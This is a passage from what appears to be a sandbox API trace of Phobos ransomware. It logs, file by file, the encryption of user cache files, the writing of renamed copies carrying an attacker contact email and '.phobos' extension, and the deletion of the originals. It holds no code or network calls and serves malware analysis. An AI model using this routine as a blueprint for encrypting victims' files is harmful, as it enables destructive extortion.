WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.336] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.336] CloseHandle (hObject=0x178) returned 1 [0200.336] CloseHandle (hObject=0x100) returned 1 [0200.336] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini")) returned 1 [0200.337] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.338] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0200.338] CloseHandle (hObject=0x100) returned 1 [0200.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini")) returned 0x2026 [0200.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.339] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.339] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.339] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.339] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.339] ReadFile (in: hFile=0x100, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0200.340] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.341] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0200.342] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0200.342] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.342] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.342] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.342] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.342] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.342] CloseHandle (hObject=0x100) returned 1 [0200.342] CloseHandle (hObject=0x178) returned 1 [0200.342] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini")) returned 1 [0200.343] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.345] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0200.345] CloseHandle (hObject=0x178) returned 1 [0200.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini")) returned 0x2026 [0200.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.345] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.345] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.346] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.346] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.346] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0200.347] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.347] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0200.348] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0200.348] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.348] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.348] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.348] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.348] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.348] CloseHandle (hObject=0x178) returned 1 [0200.349] CloseHandle (hObject=0x100) returned 1 [0200.349] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini")) returned 1 [0200.350] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.350] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0200.350] CloseHandle (hObject=0x100) returned 1 [0200.350] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini")) returned 0x2026 [0200.350] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.351] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.351] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.351] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.351] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.351] ReadFile (in: hFile=0x100, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0200.352] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.352] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0200.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0200.353] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.353] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.353] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.353] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.353] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.353] CloseHandle (hObject=0x100) returned 1 [0200.353] CloseHandle (hObject=0x178) returned 1 [0200.353] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini")) returned 1 [0200.354] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.356] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32768) returned 1 [0200.356] CloseHandle (hObject=0x178) returned 1 [0200.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat")) returned 0x2026 [0200.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.356] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.356] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.357] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.357] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.357] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8000, lpOverlapped=0x0) returned 1 [0200.489] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010, dwBufLen=0x8010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010) returned 1 [0200.489] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8010, lpOverlapped=0x0) returned 1 [0200.490] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0200.490] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.490] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.490] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.490] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.490] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.491] CloseHandle (hObject=0x178) returned 1 [0200.491] CloseHandle (hObject=0x100) returned 1 [0200.491] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat")) returned 1 [0200.492] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.492] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0200.492] CloseHandle (hObject=0x100) returned 1 [0200.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini")) returned 0x2026 [0200.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.493] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.493] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.493] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.493] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.493] ReadFile (in: hFile=0x100, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0200.494] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.513] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0200.514] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0200.514] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.514] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.514] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.514] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.514] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.514] CloseHandle (hObject=0x100) returned 1 [0200.514] CloseHandle (hObject=0x178) returned 1 [0200.514] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini")) returned 1 [0200.515] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.516] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12201) returned 1 [0200.516] CloseHandle (hObject=0x178) returned 1 [0200.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak")) returned 0x2020 [0200.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.517] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, 